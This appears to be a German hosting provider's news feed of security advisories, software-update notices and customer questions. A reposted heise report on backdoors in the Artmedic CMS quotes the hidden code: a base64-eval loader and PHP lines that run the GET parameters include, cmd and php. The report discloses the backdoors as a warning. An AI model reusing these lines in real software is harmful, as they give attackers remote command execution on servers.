Derzeit wird offensichtlich versucht Anwender mit Hilfe einer gefaelschten
PayPal E-Mail zur Installation eines Schadprogramms zu bewegen.

PayPal ist ein Dienst zur Abwicklung von Finanztransaktionen im
Internet, insbesonders bei Bay-Auktionen. Zur Zeit werden E-Mails mit
dem Betreff PayPal E-Tan Software Nr.' verbreitet, die im Anhang eine
ZIP-Datei enthalten, die angeblich eine 'E-Tan Software' fuer das
sichere Banking via PayPal enthaelt. Die Datei im ZIP-Archiv enthaelt
jedoch einen Trojaner, der nach der Installation weitere Schadsoftware
aus dem Internet auf den Rechner des Benutzers laedt. Zur Zeit ist die
Erkennung des Trojaners und der nachgeladenen Schadsoftware durch
Anti-Virensoftware noch lueckenhaft.


Empfehlung:

Oeffnen Sie daher keine E-Mail mit dem Betreff 'PayPal E-Tan Software
Nr.' und installieren Sie keine Programme aus nicht vertrauenswuerdigen
Quellen.


Mehr Informationen zu Trojanischen Pferden finden Sie auf der
BSI-FUER-BUERGER-Seite http://www.bsi-fuer-buerger.de/viren/04_04.htm

Sehr geehrte ok-webhosting Kunden,

durch einen Fehler in der Verzeichniserstellungsroutine, die der Dumper bisher benutzte um den Verzeichnisschutz zu erstellen ist es durch gezielte Manipulation möglich den Schutz zu umgehen, so das entsprechende Dumps frei zugänglich sind.

Alle Anwender des MySQL-Dumper wird daher dringend empfohlen Ihre Version des MySQL-Dumper schnellstmöglich zu aktualisieren bzw. alternativ den Sicherheitsfix des Herstellers zu installieren.

Alle bisher veröffentlichten Versionen des MySQL-Dumper sind von der o.g. Schwachstelle betroffen.

Weitere Infos, sowie den aktuellen Sicherheitsfix finden sich im Forum des Herstellers unter http://www.mysqldumper.de/board/viewtopic.php?t=2853

Aktuelle, gefixte Versionen des MySQL-Dumpers finden sich unter http://www.mysqldumper.de/board/downloads.php?cat=2

Sehr geehrte ok-webhosting Kunden,

phpMyAdmin wurde heute auf den Versionsstand 2.10.2 gebracht.

Gegenüber der Vorgängerversion handelt es sich um ein reines Bugfix-Release durch welches Fehler behoben wurden.

Details entnehmen Sie bei Bedarf der
Versionshistory

Sehr geehrte ok-webhosting Kunden,

ImageMagick wurde auf sämtlichen Systemen auf die Version 6.3.4 gebracht.
Der Pfad zu ImageMagick lautet unverändert /usr/local/bin

Interreseierte Kunden finden hier das vollständige Changelog

Sehr geehrte ok-webhosting Kunden,

auf sämtlichen Serversystemen wurde ein Update von PHP 5.2.2 auf PHP Version 5.2.3 durchgeführt.

Mit der neuen PHP-Version 5.2.3 wurden mehrere sicherheitsrelevante Schwachstellen behoben.

Die Release-Notes umfassen unter anderem die Behebung eines Integer-Überlaufs in der Funktion chunk_split() und einer Ausbruchsmöglichkeit für die Pfadrestriktionen des Safe-Mode durch einen Fehler in der Funktion realpath() sowie die Schließung einer Lücke in der Funktion imagecreatefrompng().

Bei zwei Bugfixes – einer im Timeout-Handling von SSL-Verbindungen und einer im Zusammenhang mit fehlenden HTTP_RAW_POST-Daten – handelt es sich um Nachbesserungen von Patches in der Vorgängerversion 5.2.2.

Für alle Interessierten findet sich das Changelog unter
http://www.php.net/ChangeLog-5.php#5.2.3

Hallo auch.

Ich habe in einem Paket 2 Domains gebucht. Beide Domains, verweisen auf unterschiedliche Startseiten (Unterverzeichnisse). Kann ich die Statistikfunktion so einrichten, das ich eine getrennte Statistik für jede Domain bekommen kann ?

Guten Abend,
ich wollte mal fragen wie es aussieht ob man den Domainnamen ändern lassen kann?
Ich wäre auch bereit wieder Geld zu zahlen. Allerdings nicht wieder für das halbe Jahr.
Ich bitte um Antwort.
Ich wollte meine Homepage: www.tagclan.de
in: www.german-dreamz.de ändern!
Falls möglich können Sie sich mit mir auch per icq in Kontakt setzen.
icq: 289161161

Mfg
Nooblike

Im Code des Content Management Systems Artmedic sind mehrere Hintertüren versteckt, über die ein Angreifer den Server komprimitieren und komplett übernehmen kann. Darüber hinaus versendet das Setup-Skript eine E-Mail mit dem Namen des unterminierten Servers an eine Adresse in Russland.

An mindestens drei Stellen enthält der PHP-Code des CMS offenbar nachträglich eingefügte Statements der Form:

$template1 = 'aWYoJF9HR...';
eval(base64_decode($template1));

Das entpackt die kryptische, base64-kodierte Zeichenkette zunächst und führt die so erhaltenen Befehle dann via eval aus.

if($_GET['include']) include($_GET['include']);
if($_GET['cmd']) passthru($_GET['cmd']);
if($_GET['php']) eval($_GET['php']);

Dieser PHP-Code wertet die GET-Parameter include, cmd und php aus. Damit kann ein Angreifer durch den Aufruf spezieller URLs eigenen Code einschleusen und beliebige Befehle auf dem Server starten.

Die fraglichen Dateien sind zumindest in der aktuell zum Download angebotenen Version 3.4 enthalten und tragen ein Datum vom 2. Mai, das jedoch auch manipuliert sein könnte. Die Anbieter von Artmedic haben bislang auf Nachfragen von heise Security nicht geantwortet. Wer eine Site mit Artmedic betreibt, sollte diese sofort offline nehmen und den Server genauestens auf Hinterlassenschaften unerwünschter Besucher untersuchen.

Quelle: heise.de

[/b]

Sehr geehrte ok-webhosting Kunden,

der Zend Optimizer wurde auf die neuste Version 3.2.8 upgedatet.
Gegenüber der Version 3.2.6 wurden wiederum einige Fehler behoben.

Durch Zend Optimizer werden PHP-Scripte auf dem Server zum Teil
bis zu 40 % schneller ausgeführt! Außerdem lassen sich Zend-Guard codierte Dateien ausführen.

Interessierte Kunden finden weitere Informationen auf den Seiten des Anbieters unter http://www.zend.com/de/products/zend_optimizer

Sehr geehrte ok-webhosting Kunden,

der Webmailer SquirrelMail wurde auf die Version 1.4.10a gebracht.

Die neue Version enthält ein Sicherheitsfixes, da für die Vorgängerversion eine Schwachstelle bekannt wurde, ueber die Angreifer unter bestimmten Voraussetzungen Cross-Site-Scripting-Angriffe durchfuehren konnten.